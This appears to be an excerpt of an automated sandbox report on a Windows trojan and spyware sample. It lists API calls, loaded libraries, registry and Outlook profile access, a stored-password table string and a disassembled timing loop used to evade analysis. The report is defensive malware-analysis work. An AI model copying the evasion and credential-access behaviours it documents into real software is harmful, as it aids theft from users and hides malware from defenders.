            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B565F5_2_384B565F
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B56505_2_384B5650
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B56605_2_384B5660
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B2E005_2_384B2E00
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B2E105_2_384B2E10
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B36C25_2_384B36C2
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B36C05_2_384B36C0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B96B85_2_384B96B8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B3F725_2_384B3F72
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B3F705_2_384B3F70
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B5F105_2_384B5F10
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B67C05_2_384B67C0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BAFE85_2_384BAFE8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BAFF85_2_384BAFF8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384BAFF75_2_384BAFF7
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B0F985_2_384B0F98
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B0FA85_2_384B0FA8
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_384B67B05_2_384B67B0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_389E6FA05_2_389E6FA0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_389ED6085_2_389ED608
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_389EE7905_2_389EE790
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_389E83285_2_389E8328
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: String function: 00402BBF appears 49 times
            Source: ppISxhDcpF.exe, 00000005.00000002.2734705758.00000000354E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ppISxhDcpF.exe
            Source: ppISxhDcpF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_004032A0
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402095
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeMutant created: NULL
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile created: C:\Users\user\AppData\Local\Temp\nsxAE23.tmpJump to behavior
            Source: ppISxhDcpF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000357E8000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000357D3000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000357B5000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000357C5000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2736032194.00000000366FD000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000357F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ppISxhDcpF.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile read: C:\Users\user\Desktop\ppISxhDcpF.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ppISxhDcpF.exe "C:\Users\user\Desktop\ppISxhDcpF.exe"
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess created: C:\Users\user\Desktop\ppISxhDcpF.exe "C:\Users\user\Desktop\ppISxhDcpF.exe"
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess created: C:\Users\user\Desktop\ppISxhDcpF.exe "C:\Users\user\Desktop\ppISxhDcpF.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: ppISxhDcpF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1991339210.00000000035CA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2709490272.000000000225A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_0015A487 push dword ptr [ebp+ecx-75h]; retf 5_2_0015A492
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_0015A4F9 push dword ptr [ebp+ebx-75h]; iretd 5_2_0015A4FD
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile created: C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeAPI/Special instruction interceptor: Address: 363A850
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeAPI/Special instruction interceptor: Address: 22CA850
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeRDTSC instruction interceptor: First address: 3605623 second address: 3605623 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB9FD114B83h 0x00000008 inc ebp 0x00000009 push edx 0x0000000a mov edx, 1EEFD62Bh 0x0000000f cmp edx, 000000C2h 0x00000015 jl 00007FB9FD14A6BAh 0x0000001b pop edx 0x0000001c inc ebx 0x0000001d cmp ch, bh 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeRDTSC instruction interceptor: First address: 2295623 second address: 2295623 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB9FCEC3213h 0x00000008 inc ebp 0x00000009 push edx 0x0000000a mov edx, 1EEFD62Bh 0x0000000f cmp edx, 000000C2h 0x00000015 jl 00007FB9FCEF8D4Ah 0x0000001b pop edx 0x0000001c inc ebx 0x0000001d cmp ch, bh 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeMemory allocated: 356D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeMemory allocated: 354F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598561Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596063Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeWindow / User API: threadDelayed 1683Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeWindow / User API: threadDelayed 8167Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeAPI coverage: 3.7 %
